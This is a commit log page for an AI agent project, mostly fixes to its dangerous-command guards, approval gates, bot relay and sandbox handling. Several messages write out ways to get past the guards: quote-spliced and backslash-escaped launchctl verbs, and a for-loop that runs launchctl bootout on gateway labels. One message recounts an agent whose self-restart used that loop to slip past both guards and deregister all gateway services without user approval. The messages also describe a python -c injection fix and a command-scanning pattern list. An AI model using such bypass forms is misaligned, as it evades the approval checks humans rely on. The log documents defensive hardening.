Commit Graph

3587 Commits

Author SHA1 Message Date
Teknium d8d1e18ab9 test(terminal): harden watch_patterns lifetime cap — delivered-only counting, Nth-delivery promotion, docstring
Follow-ups on top of the cherry-picked #93532 cap:
- Regression tests: suppressed (in-cooldown) matches must NOT consume the
  lifetime budget; the cap trips exactly at the Nth DELIVERED match and
  promotes to notify_on_complete with the watch_disabled summary queued
  right after the final match.
- Extract _emit_lifetime_watch_disabled() and emit the summary even when
  the global breaker drops the final match, so the user always learns why
  watching went quiet (parity with the strike-limit path).
- Mention the lifetime cap in the terminal tool docstring (the schema text
  was already updated by #93532).

Refs #93513
2026-08-24 03:22:48 -07:00
chelsealong b3730153c3 fix(terminal): cap watch_patterns notifications over a process's lifetime
Per-session rate limiting only counts consecutive strike windows, so a
pattern that recurs at a cadence just above WATCH_MIN_INTERVAL_SECONDS
(e.g. a service restarted repeatedly over a day) never trips the
existing strike-limit disable — each match lands in its own clean
cooldown window. Every one of those matches still forces a full-context
agent turn, which stalls the event loop on large sessions (#93513).

Add WATCH_LIFETIME_MAX_HITS: once a session has delivered this many
watch_match notifications over its whole life, disable watch_patterns
and fall back to notify_on_complete, reusing the existing disable path.
2026-08-24 03:22:48 -07:00
Teknium 42a6d761d2 fix(bot-relay): add shutil.which step to CLI resolution and pin utf-8 decoding on delivery subprocess
Salvage hardening on top of #93601 (with #93597 covering the same core
mechanisms) for #93590:

- _hermes_cli(): after the venv-sibling check (hermes.exe on win32),
  try shutil.which('hermes') before the bare-name fallback, so
  environments with a PATH but no venv sibling resolve exactly what an
  interactive shell would. Platform test switched os.name -> sys.platform
  ('win32') per repo convention.
- tui_gateway/methods_bot_relay.py deliver: pin encoding='utf-8',
  errors='replace' on both subprocess.run sites — without them the
  child's UTF-8 output is decoded with the locale codec (cp1252/GBK on
  Windows), mangling non-ASCII replies or raising on undecodable bytes.
- Regression tests: shutil.which resolution step, bare-name fallback
  with which=None, and encoding-pin assertions in the deliver transport
  test.

Refs #93590, #93597, #93601
2026-08-24 03:21:37 -07:00
liuhao1024 c099ef05de fix(bot-relay): Windows path SyntaxError in waiter + PATH-less delivery ENOENT
Two failures on a Windows desktop install relaying to a remote gateway
(#93590):

1. waiter_command embeds the reply path in generated python -c source
   with !r. repr escapes each backslash, but the Windows execution layer
   folds \\ back to \, so \U in C:\Users\... parses as a unicode escape
   and SyntaxErrors the whole waiter script. Raw-string literals keep
   the folded single backslash a literal; POSIX paths have no
   backslashes so the prefix is a no-op there, and \' inside a raw
   literal still cannot terminate the string, keeping the #93091
   injection defense intact.

2. local_delivery_command hardcoded "hermes", relying on PATH — absent
   in service contexts (systemd units, desktop launchers, non-login SSH
   shells), so delivery died with ENOENT. It now resolves the CLI next
   to this gateway's own interpreter (venv bin/Scripts sibling,
   hermes.exe on Windows) with a bare-name fallback. The #93091
   per-profile turn-lock recognition in bot_mode_dm now matches the CLI
   element by basename (split on both separators) so resolved absolute
   paths still take the lock instead of silently bypassing it.

Fixes #93590
2026-08-24 03:21:37 -07:00
Teknium a7aa814c42 fix(tools): widen the command-position anchor to the whole hardline class
#93392 was not just one pattern: every hardline rule with a bare \b anchor
fired on its token anywhere in the command line, including inside quoted
prose handed to echo, git commit -m, or gh --body. Anchor the
command-name-token rules and quote-mask the positionless ones:

- dd-to-block-device and kill -1 get the same _CMDPOS anchor as the
  format/rm/shutdown families, keeping their argument tails.
- redirect-to-block-device and the fork bomb have no command-name token to
  anchor (`>` appears mid-command; the bomb is a function definition), so
  they now match a quote-masked variant (_mask_quoted_prose) where quoted
  string content is blanked. $() and backtick spans inside double quotes
  stay raw (the shell executes them), and any command whose command-position
  words include a shell carrier (sh/bash/zsh/ksh/dash -c, eval, source, .)
  is scanned unmasked -- quoting is not a bypass. bash/sh -c payloads also
  still surface as raw detection variants via _execution_flag_findings.

Regression tests cover both directions for every touched pattern: quoted
prose passes, and every true-positive shape (bare, ; && | separators,
sudo/env prefix, $(), backticks, sh -c/bash -c/eval payloads) stays on the
unconditional floor.
2026-08-24 03:20:14 -07:00
liuhao1024 8163c8731b fix(tools): anchor the mkfs hardline pattern to command position
mkfs was the only HARDLINE_PATTERNS entry without a _CMDPOS anchor, so
the unconditional floor blocked any command that merely mentioned the
token inside quoted prose — `echo "does this workflow use mkfs
anywhere?"` was refused outright (#93392) instead of running the echo.

Anchor mkfs to command position like every sibling entry (rm root-
delete, shutdown family, dd): it matches at the start of a command,
after separators, or behind sudo/env/exec/nohup/setsid wrappers, and
no longer fires on argument-position mentions. The quote-aware
_mark_command_starts pass already keeps separators inside quoted
strings from looking like command starts, and \b still protects
mkfs_helper-style names.
2026-08-24 03:20:14 -07:00
cycorld 350fb975b9 fix(cron): prevent empty payload loop and protect against blank name overwrite
- Reject cron jobs with empty runnable payload (blank prompt, no script, no skills) on create and update
- Auto-pause legacy unrunnable jobs at schedule time to prevent infinite fire loops
- Prevent blank name string in cron update tool from unintentionally wiping job names
- Add comprehensive test coverage (34 tests)
2026-08-24 15:47:42 +05:30
Teknium 410b1ec555 fix(tools): share the task-id path sanitizer across backends; cover singularity overlays
Hoist the sandbox-directory sanitizer into tools/environments/base.py as
sanitize_task_id_for_path() and route BOTH host-path consumers through it:
the docker persistent sandbox (get_sandbox_dir()/docker/<id>) and the
singularity persistent overlay (hermes-overlays/overlay-<id>). One helper,
one mapping, whole bug class fixed in one place instead of per-backend
copies (#92414, #92640, #93044).

docker.py keeps _sandbox_dir_name as an alias of the shared helper so the
sanitized mapping (safe ids verbatim, digest suffix on rewrite for
collision safety) is unchanged for existing sandboxes.

Co-authored-by: salch-cred <salch-cred@users.noreply.github.com>
Co-authored-by: Parker Fawcett <259203091+Parker-Fawcett@users.noreply.github.com>
2026-08-23 21:12:32 -07:00
HexLab98 fb381e8055 fix(docker): sanitize the session-key task_id used as a sandbox path
With terminal.backend: docker and container_persistent: true, every gateway
session failed on its first tool call: docker run exited 125 with
"invalid spec ... too many colons" and no command could execute.

_resolve_container_task_id() returns "session:<key>" whenever a session key
is present, and gateway session keys are colon-delimited
(session:agent:main:telegram:dm:<chat_id>). DockerEnvironment joined that id
into the persistent sandbox path verbatim, so the -v spec became
".../docker/session:agent:main:telegram:dm:<id>/home:/root" — docker splits a
spec on ':', read the extra fields as extra mount options, and refused the
run. The container label a few lines below already guards this exact value
class via _sanitize_label_value(); the bind-mount source did not.

Derive the directory name through _sandbox_dir_name() instead. Ids that are
already bind-mountable are returned verbatim, so the shared "default" sandbox
and RL/benchmark rollouts keep their existing directory and no installed
package or /root state moves; only ids that could never have produced a
working mount are rewritten. A rewrite carries a digest of the original id,
because ':' -> '_' alone is not injective and would otherwise collapse two
chats onto one persistent /root.
2026-08-23 21:12:32 -07:00
beplee dd20c30dec fix(curator): check unpin result, guard status ghost rows, tighten test
Review feedback on #93149:
- _cmd_unpin now checks set_pinned's return (same false-success defect
  existed symmetrically on the unpin path)
- curated_report() pinned-visibility branch requires a local skill dir,
  so stale records for deleted dirs don't render as ghost rows
- test 2 asserts rc==0 unconditionally instead of vacuous-passing
- error message points to list-unmanaged (status doesn't render reasons)
2026-08-23 21:12:20 -07:00
beplee 7caa731e80 fix(curator): report pin failures instead of false success and surface pinned unmanaged skills
`hermes curator pin <skill>` printed success even when the underlying
write never landed. set_pinned() routes through _mutate() with
require_curation_eligible=True, which silently returns None for skills
that pass is_agent_created() but fail is_curation_eligible() — e.g. a
user-created skill named "plan", which PROTECTED_BUILTIN_SKILLS blocks
by name. The CLI then announced a pin that does not exist (#92993).

Also, a pin that DID land on an eligible-but-unmanaged skill (no
created_by marker) was invisible: curated_report() only iterated
list_agent_created_skill_names(), which requires the management marker,
so the skill showed up under 'unmanaged' with no trace of its pin.

- set_pinned() now returns bool write success; _cmd_pin() checks it,
  exits nonzero and explains the refusal when the write did not land
- curated_report() additionally includes curation-eligible skills whose
  usage record carries pinned=true, so their pins are visible in status

Fixes #92993
2026-08-23 21:12:20 -07:00
Teknium c584d15cdc feat(bots): typed failure reasons reach the sending agent on A2A calls (#93091)
message_agent callers previously got provider prose (a raw 401
paragraph, a missing-provider essay) and could not branch on the
failure class. Now the #93091 item-1 reason enum rides the whole relay
roundtrip:

- Desktop relay drain forwards bot_relay.deliver's error.data.reason
  into bot_relay.reply (and prefers it for the attention badge over
  free-text re-parsing);
- write_reply already persisted reason / classified fallbacks;
- the sender-side waiter prints "[reason: <code>]" ahead of the free
  text, so the completion notification the sending agent receives is
  machine-branchable.

Additive everywhere: healthy replies unchanged, reasonless errors
classify to a code, old consumers keep working.
2026-08-23 20:07:21 -07:00
Adolanium 2912c36aa4 fix(gateway): stop multiplex allowlist leak and bot-relay python -c injection
_auth_env fell through to os.environ on a scoped miss, so one profile
could inherit another profile's allowlists and allow-all flags.

bot_relay.waiter_command put connection_id into python -c source. A
quote in the id broke the waiter. A crafted id could run extra Python
in the sender gateway.
2026-08-23 20:00:30 -07:00
Teknium b274b346d8 feat(bots): retry session policy — resume transient turns, compress-and-resume on context overflow (#93091 item 5)
Maintainer ruling (2026-08-23): a retried bot turn never mints a fresh
session. retry_action() maps the #93091 item-1 reason enum to one of
resume / compress_then_resume / none:

- transient classes (runtime_offline, delivery_timeout, rate limit,
  server error) re-run the same Bot Chat session once;
- context_overflow also re-runs the same session — the retried turn
goes through the pre-API compaction pass in conversation_loop.py,
  which compacts the over-threshold transcript first (the one
  sanctioned context mutation); no fresh-session escape hatch exists;
- auth/quota/config/model classes never auto-retry.

Wired at both delivery surfaces (fix the class, not one site):
bot_relay.deliver (relay handler) and _run_delivery (local
message_agent runner). Failed deliveries now carry the classified
reason in the structured error payload (error.data.reason).

Sabotage-verified: with the retry blocks removed, 3 consumer tests
fail; with them present, 22/22 pass.
2026-08-23 20:00:18 -07:00
Teknium 7526bd39a8 feat: every subagent's prompt embeds the workspace's project context files
Widened from /review to the class: _build_child_system_prompt now runs
the parent's resolved workspace_path through
agent.prompt_builder.build_context_files_prompt (same discovery/
priority/caps as the main system prompt: .hermes.md > AGENTS.md chain >
CLAUDE.md > .cursorrules; SOUL.md skipped) and embeds the result as
binding conventions. All delegate_task children get it — reviewer
included — since children are built with skip_context_files=True and
previously worked in repos without the repo's own conventions.

The review-engine-local load_workspace_context duplicate is removed;
the reviewer inherits the block via the shared child prompt path.
workspace_path comes only from explicit sources (_resolve_workspace_hint
— TERMINAL_CWD / agent cwd hints, never bare getcwd), so the #64590
install-tree-fallback guard concern doesn't apply.

Tests moved to pin the generalized path (real-filesystem AGENTS.md via
_build_child_system_prompt, empty/no-workspace negatives, reviewer E2E
through start_review). Docs: subagent-context section + /review flow
(en + zh-Hans).
2026-08-23 19:04:37 -07:00
Teknium 081cdd9911 fix(terminal): subagents no longer hijack the tty with an interactive sudo prompt
delegate_task children run on worker threads of the parent process and
inherit the process-wide HERMES_INTERACTIVE=1 the CLI sets at startup.
_transform_sudo_command's interactive gate therefore fired inside
children with no sudo callback registered, falling through to the raw
/dev/tty password prompt: a password box printed mid-TUI from a
background thread, parallel children racing for the tty, and each child
blocked for the full 45s timeout.

Gate the prompt (and the sibling 'you will be prompted again' message
after an auth failure) on agent.delegation_context.is_delegated_child_context(),
the ContextVar set around every child run and propagated through
contextvars.copy_context onto the executor thread. Children now behave
as headless for sudo: configured SUDO_PASSWORD, the session cache, and
the NOPASSWD probe still work; otherwise the command fails gracefully
with a subagent-specific tip.

A/B verified: 3 regression tests fail on merge-base, 7/7 pass at head.
2026-08-23 19:00:47 -07:00
UniversePeak b0001f45a2 fix(cron): keep hermes console script on child PATH 2026-08-23 18:27:15 -07:00
justcarlosm 478a09c06b fix(browser): floor browser-use CLI subprocess PATH with sane system dirs
Profile-spawned workers (kanban bots, cron jobs) can inherit a PATH of
only version-manager dirs — observed in the wild as one nvm node dir
repeated 7x. The uv-installed browser-use binary is a POSIX sh
trampoline that resolves dirname/realpath through PATH, so it died
with 'realpath: not found … exec: /python: not found' (exit 127)
before its own Python ever started.

_base_subprocess_env now floors the child PATH via browser_tool's
_merge_browser_path (the agent-browser backend already guards the same
hazard), degrading to appending FHS bin dirs if that import is ever
unavailable. Windows is a no-op (.cmd shims don't trampoline).

Verified: unit tests + real uvx browser-use --version under a
nvm-only-PATH worker env, rc 127 -> rc 0.
2026-08-23 18:25:35 -07:00
liuhao1024 5d8b031514 fix(stt): surface the selection-specific error for explicit openai STT
When the managed openai-audio gateway is unavailable,
_resolve_openai_audio_client_config() raises a ValueError that names the
blocker (and, for managed-Nous users, the `hermes tools` remediation).
The boolean probe in _get_provider's explicit-openai branch flattened
that into False, so the log claimed "no API key available" and the
transcription result returned the all-provider install hint -- pointing
operators at unrelated setup instead of their managed route (#93045).

Resolve the config directly in the branch so the warning names the real
blocker, and let the dispatch's "none" fallback surface the
selection-specific error for an explicit openai choice. No fallback is
added: an unavailable selection still resolves to "none", it just
reports why.
2026-08-23 18:25:35 -07:00
fangliquanflq c1c0efa375 fix(code-exec): preserve interrupt cancellation source 2026-08-23 18:25:19 -07:00
Artur Hapantsou b34edd6b01 fix: execute_code and argv-list payloads no longer bypass the gateway lifecycle guard (#68289)
execute_code lacked the lifecycle guard entirely, and Python argv-list
forms (subprocess.run([...])) separated command words with brackets and
commas the shell-shaped pattern could not see. Mirror the terminal_tool
guard in execute_code (ownership-gated per #92560) and strip argv-list
punctuation in the token-join re-scan. Salvaged from PR #68289 by
@arcimun, adapted to the ownership gate and current guard structure.
2026-08-23 18:01:59 -07:00
KeaneYan 1c791cbfe6 fix(gateway): resolve uninstall lifecycle guard conflict 2026-08-23 18:01:59 -07:00
BotUser 679e07a074 fix(gateway): close order-dependency + missing-verb gap in launchctl lifecycle guards
The gateway-lifecycle guards in cron/lifecycle_guard.py (Branch B, the
unconditional hard-block used by cron creation and the terminal tool when
_HERMES_GATEWAY=1) and tools/approval.py's launchctl rule both matched
`launchctl <verb> ... hermes[.-]?gateway` as a single sequential regex,
requiring the hermes-gateway label to appear literally AFTER the verb.

A shell command that builds the label earlier in the string — e.g. a
for-loop reading labels from a list defined before the actual launchctl
call — defeats that ordering entirely:

    for item in 'ai.hermes.gateway-apollo:...' 'ai.hermes.gateway:...'; do
      label=${item%%:*}; plist=${item#*:}
      launchctl bootout "gui/$uid/$label"
      launchctl bootstrap "gui/$uid" "$plist"
    done

The literal text "hermes.gateway" only ever appears in the for-list,
never after "bootout" — so `[^\n]*\bhermes[.\-]?gateway` never matches at
the verb's position, even though the command unambiguously targets the
gateway's own launchd label.

cron/lifecycle_guard.py's verb list also didn't include `bootout` at all
(present in tools/approval.py's list and covered by its own test suite —
`launchctl bootout ai.hermes.gateway` is explicitly asserted as dangerous
there — so the omission in the sibling file looks like list drift between
the two guards rather than an intentional exclusion).

`bootout` is the verb that actually deregisters a launchd job (unlike
kickstart/stop, which just bounce a still-registered one), so a command
using it evades both guards, then removes the service from launchd with
no supervisor left to bring it back — worse than a simple restart-loop.

We hit this for real: a gateway self-restart (triggered from a chat
request to change the default model) used a raw terminal `launchctl
bootout`/`bootstrap` loop across 4 launchd labels instead of the normal
`hermes gateway restart` path. It slipped past both guards, self-bootout
killed the process mid-drain before its own follow-up bootstrap could
run, and all 4 gateway profiles ended up fully deregistered from launchd
with zero user approval (approvals.mode: manual was configured) until
someone manually re-bootstrapped them.

Fix: both guards now check "a launchctl lifecycle verb appears somewhere
AND a hermes-gateway label appears somewhere", independent of order, and
cron/lifecycle_guard.py's verb list gains bootout/kill/disable/remove to
match tools/approval.py's existing set. Internal recovery code
(hermes_cli/gateway.py's own `subprocess.run(["launchctl", "bootout",
...])` calls) is unaffected — these guards only scan shell-command
strings composed by the agent's terminal/cron tools, not the CLI's
trusted internal subprocess argument lists.

Adds regression tests in both test files reproducing the exact incident
command (label built in an earlier for-loop segment, referenced only via
`$label` at the point of the verb).

Co-Authored-By: Claude Opus 5 <noreply@anthropic.com>
2026-08-23 17:56:36 -07:00
thenabbu acf8245607 fix(tools): pass single_query_deny_message to the ssh-config write approval gate
Commit 1596148ff made single_query_deny_message a required keyword-only
parameter of _run_approval_gate() and updated its two callers inside
tools/approval.py, but missed the third caller: the SSH-config write
guard in tools/file_tools.py (_check_approval_required_write,
pattern_key="ssh_config_write").

Any gated write to an SSH client config therefore raised
  TypeError: _run_approval_gate() missing 1 required keyword-only
  argument: single_query_deny_message
instead of routing through the human-approval flow.

- Pass the kwarg with a single-query-specific deny message that points
  operators at approvals.single_query_mode: approve.
- Add a regression test asserting the gate call passes every required
  kwarg (fails on unpatched main).

Fixes #93201
2026-08-23 17:54:20 -07:00
Kang Wang dd2b5172e4 fix: pass single_query_deny_message to approval gate for ssh config writes 2026-08-23 17:54:20 -07:00
Teknium 12395e57b4 feat: /review command — independent reviewer subagent on every surface
/review takes the last 10 chat messages plus optional instructions,
spawns a full-privilege background subagent (the async delegation
rail) that investigates the referenced work (PR, code, docs), and its
complete review re-enters the spawning session as a normal
async-delegation completion the primary agent can act on.

- agent/review_engine.py: shared engine (snapshot, briefing,
  auxiliary.review credential resolution, dispatch, note formatting)
- tools/delegate_tool.py: internal credentials_cfg per-call override
  (never model-facing) resolved through the same credential system as
  delegation.provider pins
- auxiliary.review config block (provider/model/base_url/api_key/
  api_mode); provider auto + empty model = inherit the main model
- Surfaces: CLI process_command, gateway run.py dispatch +
  slash_commands handler (binds the approval session key so the
  completion routes back), TUI/Desktop live dispatch in
  tui_gateway/server.py, CommandDef registry (+Slack /hermes-only cap)
- Docs: delegation.md section + slash-commands.md (both tables)
- Tests: 15 engine tests (sabotage-verified: credentials_cfg and
  dispatch tests fail without the fix), 4 gateway handler tests
  through the real async rail
2026-08-23 17:38:38 -07:00
Axel Vanni 6d501c2958 fix(cron): make gateway lifecycle matching shell-token aware (#80269)
The hard block matched raw command text, but a shell resolves quote
splicing (`kick"start"`) and backslash escaping (`kick\start`) into the
literal verb before execution. So `launchctl kick"start" -k
gui/501/ai.hermes.gateway` ran exactly as the blocked `kickstart` form
while both the non-bypassable block and the approval detector missed it —
leaving an approval-bypassing gateway self-lifecycle operation reachable.

contains_gateway_lifecycle_command now runs a second pass over
shlex-tokenized command segments, where quotes and escapes are already
resolved. It stays anchored on a hermes-gateway identifier, so prose and
non-gateway hermes services are unaffected. Because this function is the
single choke point _contains_unsafe_gateway_action calls at every
recursion level, referenced-script and `sh -c` payload scanning inherit
the fix.

tools/approval.py had the same gap for quote splices: backslash escapes
are stripped by _normalize_command_for_detection, but quote splicing in an
ARGUMENT position is not touched by _deobfuscate_shell_word_for_detection
(scoped to command-position words, deliberately — widening it would let
quoted prose match the destructive patterns). It now delegates to the
fixed guard as a last check, so an ordinary pattern match still wins and
keeps its more specific reason string.

Tests: quoted, single-quoted and backslash-spliced verbs across the
launchctl/systemctl/hermes branches, the spliced gateway identifier
itself, a splice nested in an `sh -c` payload (resolves one level deeper,
asserted at the recursive entry point terminal_tool actually calls), plus
negative cases proving prose and non-gateway labels stay unblocked.

Verified on Windows: no regressions — the 10 remaining failures across
tests/tools/test_approval.py, tests/hermes_cli/test_gateway_restart_loop.py
and tests/cron are identical on the unmodified baseline (POSIX file modes,
symlink privileges, and /bin/bash script paths).

Co-Authored-By: Claude Fable 5 <noreply@anthropic.com>
2026-08-23 16:28:56 -07:00
Teknium 9ea7fe9938 fix: quitting the CLI no longer spams shutdown-race API errors onto the shell
When the TUI exits while the post-turn background review fork is still
mid-request, every further API attempt raises 'cannot schedule new
futures after interpreter shutdown'. The conversation loop treated this
as a retryable API error: un-gated ❌ prints leaked onto the user's
shell AFTER the TUI exited (call #4, #5, #6...) and the loop retried a
doomed request until the interpreter froze the thread.

Fix the class, not the site:
- tools/interpreter_shutdown.py: single shared shutdown predicate
  (matches both CPython message variants + sys.is_finalizing()).
- cron/scheduler.py, agent/tool_executor.py: existing per-site
  predicates now delegate to the shared home (tool_executor previously
  matched only the fuller variant).
- agent/conversation_loop.py: inner retry handler recognizes the
  shutdown signal and abandons the turn — one log warning, no print,
  no traceback, no debug dump, no retry; outer handler gets the same
  guard for shutdown errors raised outside the API call.
- The outer handler's bare print() now honors suppress_status_output
  (set by the background-review fork) instead of bypassing it.

Refs #55924 #58720 (same class in cron delivery), adjacent to #90683.
2026-08-23 16:04:41 -07:00
nbxuhk 0e038425db fix: gateway lifecycle guards gate on process ownership, not inherited env
The terminal tool lifecycle guard and the gateway stop/restart CLI
guards keyed on the raw _HERMES_GATEWAY=1 env marker, which every
gateway descendant inherits (and importing gateway.run sets it too).
CLI/TUI agent sessions were falsely blocked from documented gateway
management commands. Gate on _is_supervised_gateway_process() instead,
which requires owning the live gateway PID file.

Salvaged from PR #92196 (guard half) by @nbxuhk. Fixes #92560.
2026-08-23 15:49:52 -07:00
Brooklyn Nicholson 165d1849e2 fix(approval): stop the CLI and ACP offering a scope the protected gate discards
The protected agent-instruction gate grants one operation and persists
nothing, but only the TUI/desktop and Runs transports were taught that.
The prompt_toolkit panel, the input() fallback, and the ACP editor menu
still rendered "Allow for session", so a user editing SOUL.md tapped it,
got re-prompted on the next write, and read the gate as broken.

Thread allow_session through prompt_dangerous_approval so a caller that
re-asks every time collapses every surface to once/deny, and cover the
producer-to-transport contract end to end.
2026-08-23 17:45:47 -05:00
kshitij c460e87d10 fix(bot-mode): review follow-ups for the turn lock
- Drop the false fairness claim from acquire_turn_lock's docstring (LOCK_NB
  probe + sleep retry gives no arrival-order guarantee; only the budget is).
- logger.debug once when the lock degrades to a no-op on fcntl-less
  platforms so silent serialization loss stays diagnosable.
- Document the real worst-case deliver handler hold (120s lock wait + 600s
  turn = ~720s) where clients tune their timeouts against it.
- Pin non-reentry: local_delivery_command must stay a raw 'hermes -p' argv —
  wrapping it in --run-delivery would make the child contend with its
  parent's own flock and fail every relay delivery with target_busy.
- De-flake: the cross-profile test's upper-bound wall-time assert tolerates
  loaded CI runners; the wait-duration message assert matches ~Ns generally.
2026-08-24 02:39:06 +05:30
kshitijk4poor ac3f9a2dc4 feat(bot-mode): per-profile turn lock — concurrent deliveries queue instead of racing (#93091) 2026-08-24 02:08:53 +05:30
kshitij e00d6c1995 fix(desktop): don't push a live connection as absent when its profile fetch blips
Review follow-up: relayAgentsOn() returned [] on ANY error, so a transient
profiles.list timeout pushed a fresh union roster missing a LIVE machine's
agents — and the gateway-side _target_liveness reads 'absent from a fresh
roster' as definitively offline, refusing enqueues with a false
runtime_offline during the ~60s window. Failure now returns null (distinct
from a genuinely empty list); syncRelayRosters reuses the last good rows
for that connection and prunes the cache when a connection truly leaves
profileRoutes. Source-contract test pins null-on-failure + cache fallback.
2026-08-24 01:07:33 +05:30
kshitijk4poor b96369212c feat(bot-mode): envelope TTL + offline fast-fail for bot relay (#93091 item 2) 2026-08-24 01:05:07 +05:30
kshitij 6994851694 fix(bot-mode): require status-code context for bare numeric classifier rules
Review follow-up: bare \b401\b / \b402\b / \b429\b / \b5xx\b matched any
3-digit token in error text ('line 502', 'took 429 ms'), and server_error
misfires feed AUTO_RETRYABLE — a supervisor could auto-retry a permanent
local failure. Numeric rules now require an 'error code:'/'status:'/'http'
prefix; phrase alternatives (rate limit, server error, overloaded, out of
funds) unchanged. Adds parametrize rows for the false-positive guards and
the previously untested branches (bare 'status: 401', 'upstream server
error', 'model_not_found').
2026-08-24 00:57:15 +05:30
kshitijk4poor 64eb6bb7fc feat(bot-mode): typed failure-reason codes for bot turns and relay replies (#93091 item 1) 2026-08-24 00:57:15 +05:30
Teknium 764dba6953 fix(bot-relay): sweep stale relay artifacts + never leak the deliver tempfile
Widen the DM tempfile-leak fix (#91902/#92407) to the sibling sites
PR #92784 introduced:

- tools/bot_relay.py: expose the 6h stale sweep as
  cleanup_bot_relay_artifacts() (cleanup_*_cache contract) and wire it
  into gateway housekeeping — previously it ran only when the Desktop
  drained the outbox, so plaintext envelopes/replies queued while the
  Desktop was away could sit on disk forever.
- tui_gateway/methods_bot_relay.py: move the payload write inside the
  try/finally so a failed write no longer leaks hermes-relay-dm-*.txt.
- tools/bot_mode_dm.py: _spawn_delivery takes dm_file=None for relay
  waiter deliveries, which have no plaintext DM tempfile to reclaim.
2026-08-23 03:57:43 -07:00
mehmetkr-31 793fba428a fix(bot-mode): reap orphaned DM payloads from gateway housekeeping
The in-band sweep in _write_dm_file only runs when another DM is
written — a gateway that never sends one keeps orphans forever. Expose
the sweep as cleanup_bot_dm_cache() with the same contract as the other
cleanup_*_cache helpers (returns files removed) and wire it into the
gateway housekeeping loop on the hourly media-cache cadence. Also sweeps
legacy hermes-dm-*.txt and hermes-relay-dm-*.txt orphans in the OS temp
root.

Folded in from #92407 (mehmetkr-31), adapted to the runner-owned
cleanup design salvaged from #91902.
2026-08-23 03:57:43 -07:00
tachyon-r 08742d0e32 fix(bot-mode): isolate DM tempfiles per user 2026-08-23 03:57:43 -07:00
tachyon-r 0ae18cdae0 test(bot-mode): cover delivery runner and sweep orphans 2026-08-23 03:57:43 -07:00
tachyon-r eaa61ff62d fix(bot-mode): clean up message tempfiles 2026-08-23 03:57:43 -07:00
Teknium 9e18197745 fix(cli): one-shot runs linger for notify_on_complete background processes so Bot Mode replies survive parent exit
A Bot Mode agent invoked by a handoff runs as a short-lived
`hermes -p <bot> chat -Q --query-file ...` process. When it dispatches
its reply via message_agent / bot_relay — spawned as
terminal(background=true, notify_on_complete=true) per the Bot Chat
protocol — the one-shot parent exits as soon as the turn ends. The
reply child writes to a stdout pipe owned by the dying parent and is
destroyed a few seconds later, so the handoff reply is silently lost
while the sender waits for a notification that can never come (#90879).

Fix (class-wide, not DM-specific): before the one-shot exit paths tear
down, the parent now lingers — bounded by the new
terminal.oneshot_completion_wait_seconds config (default 600s, 0
disables) — for every tracked background process spawned with
notify_on_complete=true. Plain background processes (servers, daemons,
watch-pattern monitors) carry no completion contract and are never
waited on.

- tools/process_registry.py: ProcessRegistry.wait_for_pending_completions()
  — bounded, interrupt-safe wait over pending notify_on_complete
  sessions; reconciles orphaned-pipe exits (#17327) each pass so a
  wedged reader cannot burn the full bound; KeyboardInterrupt aborts
  the linger without skipping the caller's durable teardown.
- cli.py: _finalize_single_query() lingers first, before the durable
  session flush / cleanup (covers -q and -Q, i.e. the DM recipient
  shape and bot_relay waiter spawns from one-shot agents).
- hermes_cli/oneshot.py: same linger before agent.close() (which
  kill_all()s the task's processes) on the -z path.
- hermes_cli/config_defaults.py: terminal.oneshot_completion_wait_seconds.

Tests: tests/tools/test_oneshot_completion_linger.py — unit coverage of
the wait semantics (no-op, completion, timeout, task filter, disable,
config fallback, reconcile path), exit-path ordering contracts, and a
real-process E2E: a short-lived python parent spawns a delivery child
through the real ProcessRegistry, lingers, exits, and the delivery
completes; sabotaging the linger makes the same E2E reproduce the
destroyed-delivery symptom.

Fixes #90879
2026-08-23 03:56:37 -07:00
Teknium 10f0d2278b feat(desktop): client-direct voice — use the active profile's STT/TTS keys from the desktop, no audio relay
Lowest-hop voice path in both directions for desktop + remote gateway:
mic audio goes straight to the profile's STT provider and reply text is
synthesized on the desktop with the profile's TTS provider. The
desktop-gateway link carries only text (which the chat stream carries
anyway). No second key store: GET /api/audio/voice-config returns the
profile's resolved provider/model/language/key using the exact resolution
chains transcription_tools/tts_tool use, over the authenticated REST
channel. Keys live in renderer memory only.

Backend:
- tools/voice_client_config.py: single resolver; per-provider client
  wire shapes (openai-multipart, xai-stt, elevenlabs-stt, openai-speech,
  elevenlabs-tts). Server-host-only providers (local whisper, edge,
  command/plugin) and missing credentials resolve to {mode: relay}.
  xAI OAuth stays relay (bearer refreshes server-side).
- web_server.py: GET /api/audio/voice-config, profile-scoped via the
  same _config_profile_scope seam as /api/audio/transcribe.
- config_defaults.py: voice.client_direct gate (default true).

Desktop:
- lib/voice-client-direct.ts: config fetch keyed by (connection,
  profile) with 60s TTL, provider-direct STT + TTS calls, sentence
  cutter mirroring the server pipeline's contract.
- Dictation (use-prompt-actions + session-tile) tries client-direct
  first; null -> existing relay unchanged; provider rejections surface.
- voice-playback.ts: client-direct speech session as the top rung of
  startSpeechStream/playSpeechText; WS relay + POST fallback unchanged
  below it. Barge-in via the same stopVoicePlayback sequence bump.

Validation: 13/13 backend E2E (real temp HERMES_HOME + real resolution),
live FastAPI TestClient E2E (direct + gate-flip), 15/15 client tests
(wire shapes, scope-keyed caching, rejection surfacing, sentence cutter),
sibling suites 72/72 + 36/36, tsc + eslint + ruff clean.

Docs: voice-mode.md client-direct section ships in this PR.
2026-08-23 03:54:52 -07:00
kshitijk4poor 30d4555085 fix(vision): review follow-ups — LA/PA JPEG guard, third embed site
Review pass findings on the force_jpeg change:

- Broaden the JPEG mode guard from {RGBA, P} to 'not in {RGB, L}':
  force_jpeg newly routes PNG inputs to the JPEG encoder, and an
  LA-mode PNG (grayscale+alpha) would crash img.save() with
  'cannot write mode LA as JPEG'.

- browser_use_cli's _native_screenshot_result is the THIRD native
  history-embed site: it baked the data URL into a _multimodal tool
  result with the 5 MB one-shot default and no dimension cap. Apply
  the same 256KB/1568px/force_jpeg history-reuse policy as the two
  sites already migrated.
2026-08-23 15:06:03 +05:30
kshitijk4poor c02fe6501b fix(vision): shrink oversized history embeds via JPEG quality, not halving
PNG has no quality ladder, so a text-dense screenshot over the 256KB
history-embed cap (#92699 / #92783) could only shrink by halving
dimensions — 1568px dropped to ~784px and on-screen text became
unreadable, the exact fidelity screenshot QA depends on.

Add force_jpeg to _resize_image_for_vision: the two history-embed call
sites (vision_analyze native, browser_vision native) re-encode
resize-needing screenshots as JPEG so the quality ladder (85/70/50)
absorbs the byte pressure and the readable resolution survives.
Under-cap images are untouched and stay PNG; one-shot/reactive paths
keep their existing format behavior.

Flagged during the #92783 salvage review.
2026-08-23 15:06:03 +05:30
Teknium d3e087fd8c feat(bot-mode): bots on every Desktop connection can message each other
Connections ARE the peer set: every gateway connected to the Desktop
